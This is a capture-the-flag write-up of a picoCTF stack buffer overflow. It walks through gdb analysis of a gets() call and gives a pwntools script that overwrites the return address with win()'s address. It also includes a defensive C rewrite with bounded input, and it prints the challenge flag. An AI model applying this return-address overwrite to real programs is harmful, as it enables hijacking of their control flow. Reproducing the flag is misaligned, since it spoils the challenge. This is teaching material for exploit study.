
This is a simple BOF problem.
Looking at the binary, the win() function prints the flag, but nothing ever calls win().
So we overwrite RET with the address of win() through the BOF.
Analysis
- The win() function can be found with the "info functions" command.
gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x080483ec _init
0x08048420 printf@plt
0x08048430 gets@plt
0x08048440 fgets@plt
0x08048450 getegid@plt
0x08048460 puts@plt
0x08048470 exit@plt
0x08048480 __libc_start_main@plt
0x08048490 setvbuf@plt
0x080484a0 fopen@plt
0x080484b0 setresgid@plt
0x080484c0 __gmon_start__@plt
0x080484d0 _start
0x08048500 __x86.get_pc_thunk.bx
0x08048510 deregister_tm_clones
0x08048540 register_tm_clones
0x08048580 __do_global_dtors_aux
0x080485a0 frame_dummy
0x080485cb win
0x0804862f vuln
0x0804865d main
0x080486c0 get_return_address
0x080486d0 __libc_csu_init
0x08048730 __libc_csu_fini
0x08048734 _fini
- Find the address of win().
gdb-peda$ p win
$1 = {} 0x80485cb
- Set a breakpoint and work out the distance between the buffer and RET.
gdb-peda$ pd vuln
Dump of assembler code for function vuln:
0x0804862f <+0>: push ebp
0x08048630 <+1>: mov ebp,esp
0x08048632 <+3>: sub esp,0x28
0x08048635 <+6>: sub esp,0xc
0x08048638 <+9>: lea eax,[ebp-0x28]
0x0804863b <+12>: push eax
0x0804863c <+13>: call 0x8048430 <gets@plt>
0x08048641 <+18>: add esp,0x10
0x08048644 <+21>: call 0x80486c0
0x08048649 <+26>: sub esp,0x8
0x0804864c <+29>: push eax
0x0804864d <+30>: push 0x80487d4
0x08048652 <+35>: call 0x8048420 <printf@plt>
0x08048657 <+40>: add esp,0x10
0x0804865a <+43>: nop
0x0804865b <+44>: leave
0x0804865c <+45>: ret
End of assembler dump.
gdb-peda$ b * 0x08048641
Breakpoint 1 at 0x8048641
gdb-peda$ r
Starting program: /root/vuln
Please enter your string:
AAAA
[----------------------------------registers-----------------------------------]
EAX: 0xffffd700 ("AAAA")
EBX: 0x0
ECX: 0xf7fc65c0 --> 0xfbad2288
EDX: 0xf7fc789c --> 0x0
ESI: 0xf7fc6000 --> 0x1d7d6c
EDI: 0x0
EBP: 0xffffd728 --> 0xffffd748 --> 0x0
ESP: 0xffffd6f0 --> 0xffffd700 ("AAAA")
EIP: 0x8048641 (<vuln+18>: add esp,0x10)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048638 <vuln+9>: lea eax,[ebp-0x28]
0x804863b <vuln+12>: push eax
0x804863c <vuln+13>: call 0x8048430 <gets@plt>
=> 0x8048641 <vuln+18>: add esp,0x10
0x8048644 <vuln+21>: call 0x80486c0
0x8048649 <vuln+26>: sub esp,0x8
0x804864c <vuln+29>: push eax
0x804864d <vuln+30>: push 0x80487d4
[------------------------------------stack-------------------------------------]
0000| 0xffffd6f0 --> 0xffffd700 ("AAAA")
0004| 0xffffd6f4 --> 0x0
0008| 0xffffd6f8 --> 0xf7fc6d80 --> 0xfbad2887
0012| 0xffffd6fc --> 0xfbad2887
0016| 0xffffd700 ("AAAA")
0020| 0xffffd704 --> 0xf7feae00 (call 0xf7fd6a80 <_dl_signal_error@plt>)
0024| 0xffffd708 --> 0xf7e55b4b (<puts+11>: add edi,0x1704b5)
0028| 0xffffd70c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x08048641 in vuln ()
- The buffer occupies 0xffffd700 ~ 0xffffd728 (saved ebp at 0xffffd728, RET right after it).
gdb-peda$ x/100wx $esp
0xffffd6f0: 0xffffd700 0x00000000 0xf7fc6d80 0xfbad2887
0xffffd700: 0x41414141 0xf7feae00 0xf7e55b4b 0x00000000
0xffffd710: 0xf7fc6000 0x00000000 0xffffd748 0x080486ab
0xffffd720: 0x08048810 0x00000000 0xffffd748 0x080486b3
0xffffd730: 0x00000001 0xffffd7f4 0xffffd7fc 0x00000000
0xffffd740: 0xf7fe59b0 0xffffd760 0x00000000 0xf7e06e81
0xffffd750: 0xf7fc6000 0xf7fc6000 0x00000000 0xf7e06e81
0xffffd760: 0x00000001 0xffffd7f4 0xffffd7fc 0xffffd784
0xffffd770: 0x00000001 0x00000000 0xf7fc6000 0xf7fe575a
0xffffd780: 0xf7ffd000 0x00000000 0xf7fc6000 0x00000000
0xffffd790: 0x00000000 0x2b31cc7a 0x14438a6a 0x00000000
0xffffd7a0: 0x00000000 0x00000000 0x00000001 0x080484d0
0xffffd7b0: 0x00000000 0xf7feae20 0xf7fe59b0 0xf7ffd000
0xffffd7c0: 0x00000001 0x080484d0 0x00000000 0x080484f1
0xffffd7d0: 0x0804865d 0x00000001 0xffffd7f4 0x080486d0
0xffffd7e0: 0x08048730 0xf7fe59b0 0xffffd7ec 0xf7ffd940
0xffffd7f0: 0x00000001 0xffffd8fc 0x00000000 0xffffd907
0xffffd800: 0xffffd927 0xffffd93d 0xffffd945 0xffffd950
0xffffd810: 0xffffd965 0xffffd974 0xffffd97f 0xffffd98a
0xffffd820: 0xffffd9cc 0xffffdfb8 0xffffdfda 0xffffdfe4
0xffffd830: 0x00000000 0x00000020 0xf7fd5b40 0x00000021
0xffffd840: 0xf7fd5000 0x00000010 0x9f8bfbff 0x00000006
0xffffd850: 0x00001000 0x00000011 0x00000064 0x00000003
0xffffd860: 0x08048034 0x00000004 0x00000020 0x00000005
0xffffd870: 0x00000009 0x00000007 0xf7fd6000 0x00000008
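As an added example (not code from the original write-up), here is the vuln() frame from the disassembly rebuilt in C with the gets() call replaced by a bounded read that also reports when a line was longer than the buffer; the names `ret_offset_x86`, `read_line_bounded` and `run_on_input` are chosen here, and the 60-byte input line is constructed.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Frame layout taken from the vuln() disassembly above: "sub esp,0x28" and
 * "lea eax,[ebp-0x28]" put a 0x28-byte buffer directly below the saved ebp. */
#define BUF_SIZE 0x28

/* Distance from the buffer start to the saved return address on 32-bit x86:
 * the buffer's offset below ebp plus the 4-byte saved ebp (0x28 + 4 = 44). */
size_t ret_offset_x86(size_t buf_offset_below_ebp) {
    return buf_offset_below_ebp + 4;
}

/* Bounded replacement for the gets() call at vuln+13: never writes past `size`
 * bytes, always NUL-terminates, and reports what gets() cannot. Returns 1 if
 * the line was longer than the buffer (excess discarded), 0 if it fit, -1 on
 * EOF or error before any input was read. */
int read_line_bounded(char *buf, size_t size, FILE *in) {
    if (fgets(buf, (int)size, in) == NULL) { buf[0] = '\0'; return -1; }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';                /* whole line fit */
        return 0;
    }
    int c = fgetc(in);
    if (c == EOF) return 0;                 /* line ended exactly at EOF */
    while (c != EOF && c != '\n')           /* drop the bytes that would have */
        c = fgetc(in);                      /* reached the saved ebp and RET */
    return 1;
}

/* Run the hardened read over a constructed input line standing in for stdin. */
int run_on_input(const char *line, char *out, size_t out_size) {
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL) return -1;
    int truncated = read_line_bounded(out, out_size, in);
    fclose(in);
    return truncated;
}

int main(void) {
    char buf[BUF_SIZE], longline[64];
    memset(longline, 'A', 60);              /* constructed 60-byte line + newline, */
    longline[60] = '\n'; longline[61] = '\0';   /* longer than the buffer like the payload */
    int truncated = run_on_input(longline, buf, sizeof buf);
    printf("RET is %zu bytes past the buffer; truncated=%d, kept=%zu bytes\n",
           ret_offset_x86(0x28), truncated, strlen(buf));
    return 0;
}
```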
Exploit
from pwn import *
context.log_level = "DEBUG"
p = process('./vuln')
win = 0x80485cb                 # address of win() from "p win"
payload = b"\x90" * 44          # 0x28-byte buffer + 4-byte saved ebp
payload += p32(win)             # overwrite RET with the address of win()
p.recvuntil(b'Please enter your string:')
p.send(payload)
p.interactive()
- Running it prints the FLAG as shown below.
root@d2a0b1af867f:~# python exploit.py
[+] Starting local process './vuln': pid 1308
[DEBUG] Received 0x1b bytes:
'Please enter your string: \n'
[DEBUG] Sent 0x30 bytes:
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 │····│····│····│····│
*
00000020 90 90 90 90 90 90 90 90 90 90 90 90 cb 85 04 08 │····│····│····│····│
00000030
[*] Switching to interactive mode
$
[DEBUG] Sent 0x1 bytes:
'\n' * 0x1
[DEBUG] Received 0x64 bytes:
'Okay, time to return... Fingers Crossed... Jumping to 0x80485cb\n'
'picoCTF{addr3ss3s_ar3_3asy56a7b196}\n'
Okay, time to return... Fingers Crossed... Jumping to 0x80485cb
picoCTF{addr3ss3s_ar3_3asy56a7b196}
[*] Got EOF while reading in interactive
$
[DEBUG] Sent 0x1 bytes:
'\n' * 0x1
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 1308)
[*] Got EOF while sending in interactive